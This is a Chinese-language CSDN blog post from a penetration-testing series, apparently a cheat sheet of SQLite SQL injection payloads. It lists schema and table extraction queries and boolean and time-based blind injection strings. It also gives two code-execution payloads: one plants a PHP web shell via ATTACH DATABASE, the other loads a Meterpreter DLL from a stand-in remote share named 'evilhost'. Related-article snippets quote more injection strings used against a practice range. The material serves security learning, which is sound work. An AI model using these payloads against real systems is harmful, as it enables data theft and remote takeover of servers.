WEB渗透Web突破篇-SQL注入(SQLite)

已于 2024-07-31 12:20:46 修改
阅读量367 收藏 7
点赞数 4
分类专栏: 渗透测试 文章标签: sqlite 网络安全 渗透测试 WEB安全 SQL注入
于 2024-07-31 12:05:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/140819336
版权
WEB渗透Web突破篇-SQL注入(数据库判断)-CSDN博客

WEB渗透Web突破篇-SQL注入(MYSQL)-CSDN博客

WEB渗透Web突破篇-SQL注入(MSSQL)-CSDN博客

WEB渗透Web突破篇-SQL注入(Oracle)-CSDN博客

WEB渗透Web突破篇-SQL注入(PostgreSQL)-CSDN博客

WEB渗透Web突破篇-SQL注入(SQLite)-CSDN博客

WEB渗透Web突破篇-SQL注入(DB2)-CSDN博客

WEB渗透Web突破篇-SQL注入(SQLMAP)-CSDN博客

注释符
--
/**/
版本
select sqlite_version();
字符型注入 - 获取数据库结构
SELECT sql FROM sqlite_schema
整数/字符串型 - 提取表名
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
使用limit X+1 offset X,提取所有表
整数/字符串型 - 提取列名
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
布尔类型 - 计算表数量
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
布尔类型 - 枚举表名
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
布尔类型 - 获取数据
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
时间类型
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
远程执行命令 - ATTACH DATABASE
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
远程执行命令 - Load_extension
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
默认情况下,此组件是禁用的
Pluto-2003
关注
专栏目录
SQLite注入记录(目前最全、核心函数用法、布尔盲注、时间盲注、webshell、动态库,绕过方式)
墨痕诉清风的博客
02-28 2495
为了方便开发者可以很轻便的扩展功能,SQLite 从 3.3.6 版本开始提供了支持扩展的能力,通过sqlite_load_extension API(或者 load_extension 函数 ),开发者可以在不改动 SQLite 源码的情况下,通过动态加载的库(so/dll/dylib)来扩展 SQLite 的能力。SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库,使用该命令后,所有的 SQLite 语句将在附加的数据库下执行。执行 payload 后将有一段时间的延时。
SQLite 注入
12-16
SQLite 注入 如果您的站点允许用户通过网页输入,并将输入内容插入到 SQLite 数据库中,这个时候您就面临着一个被称为 SQL 注入的安全问题。本章节将向您讲解如何防止这种情况的发生,确保脚本和 SQLite 语句的安全。 注入通常在请求用户输入时发生,比如需要用户输入姓名,但用户却输入了一个 SQLite 语句,而这语句就会在不知不觉中在数据库上运行。 永远不要相信用户提供的数据,所以只处理通过验证的数据,这项规则是通过模式匹配来完成的。在下面的实例中,用户名 username 被限制为字母数字字符或者下划线,长度必须在 8 到 20 个字符之间 – 请根据需要修改这些规则。 if
sql注入实战经历
最新发布
m0_50488257的博客
06-05 229
学完基本漏洞基本原理,想尝试挖一下src,记录一下过程。新手轻喷。
教你使用SQLite 注入
Linuxprobe18的博客
11-02 392
导读 SQLite 是一个软件库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。SQLite 是在世界上最广泛部署的 SQL 数据库引擎。SQLite 源代码不受版权限制。 SQLite 注入 如果您的站点允许用户通过网页输入,并将输入内容插入到 SQLite 数据库中,这个时候您就面临着一个被称为 SQL 注入的安全问题。本章节将向您讲解如何防止这种情况的发生,确保脚本和 SQLite 语句的安全。 注入通常在请求用户输入时发生,比如需要用户输入姓名,但用户却输入
SQL手工注入漏洞测试(SQLite数据库)
weixin_47493074的博客
10-06 752
SQL手工注入漏洞测试(SQLite数据库)
SQLlite注入
m0_55563900的博客
04-04 434
东塔学院 SQLlite注入偏 sqlite_version()查看数据库版本 select group_concat(tbl_name) from sqlite_master where type=‘table’ 查表名 select sql from sqlite_master where type=‘table’ and sql not null and name not like ‘sqlite_%’ 查当前表的字段 union select flag from flag 爆制定字段
墨者学院 - SQL手工注入漏洞测试(SQLite数据库)
多崎巡礼的博客
08-20 1727
  网站公告存在注入点   ip/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master limit 0,1 ip/new_list.php?id=1 and 1=2 union select 1,name,password,4 from WSTMart_reg      ...
06#墨者靶场-SQL手工注入漏洞测试(SQLite数据库)
shy的博客
11-15 393
地址:https://www.mozhe.cn/bug/detail/UzRPT0FZSTZDeWVid2duMVcyV055dz09bW96aGUmozhe 1.打开靶场环境,发现熟悉的通告 2.输入单引号(异常)、and 1=1、and 1=2(异常)判断存在有SQL注入存在 http://219.153.49.228:45494/new_list.php?id=1%20and%20...
常用数据库2 sqliteSQL注入
weixin_33836874的博客
06-28 1338
知识内容: 1.sqlite数据库介绍 2.sqlite数据库操作 3.SQL注入 一、sqlite数据库介绍 1.sqlite数据库 sqlite数据库:轻量级的数据库,一般开发中使用sqlite数据库,上线后将sqlite数据库换成其他数据库(比如MySQL、MongoDB)来进行快速开发 sqlite的数据库操作相对来说比较简单,sqlite是python3中...
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3125
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
【ctfshow】web-SQL注入 wp
孤桜懶契
08-21 4475
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3164
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2230
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
WEB漏洞-必懂知识点(注入)
weixin_46425310的博客
06-11 293
WEB漏洞-必懂知识点 **相对重要的:**SQL注入,文件上传,xss跨站,文件包含,反序列化,代码执行,逻辑安全,未授权访问; CSRF,SSRF,目录遍历,文件读取,文件下载,命令执行,XXE安全 WEB漏洞-SQL注入 数据库类型:access,MySQL,mssql,Oracle,postsql,sqlite,mongdb… sql注入产生的条件:可控变量,带入数据库查询,没有过滤或者过滤不严谨. 如何判断注入点: 第一种方法:and 1=1页面正常 and 1=2 页面错误 可能存在注入; 原理
SQLite 数据库注入总结
HBohan的博客
10-09 6455
前言 SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库不一样,您不需要在系统中配置。SQLite 与 MySQL 还是有些区别的,SQLite 直接读写普通磁盘文件,每一个数据库就是一个文件,可以按应用程序需求进行静态或动态连接其存储文件进行数据操作。 SQLite 基础 在本文章中我们使用 SQLite3 来学习,SQLite3 的语法与 MySQL 相似。详细语法可以在这里学习:https://www.r
一天学完SQLite数据库与其注入方式
qq_52643498的博客
05-11 1341
一天学完sqlite并掌握其注入方式的学习笔记 适合掌握mysql基础的读者看着玩玩
SQLite学习(十)SQLite的注入问题的防范、数据库文件导入和导出
Designer 小郑的技术博客
05-12 3154
本文讲解了SQLite中的SQL注入问题,以及SQLite中数据备份、数据还原、导出SQL文件的方法,用最简单的方法做最通俗的教学!
sqlite注入总结
2201_75824562的博客
05-31 1050
一份简单的sqlite注入总结
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值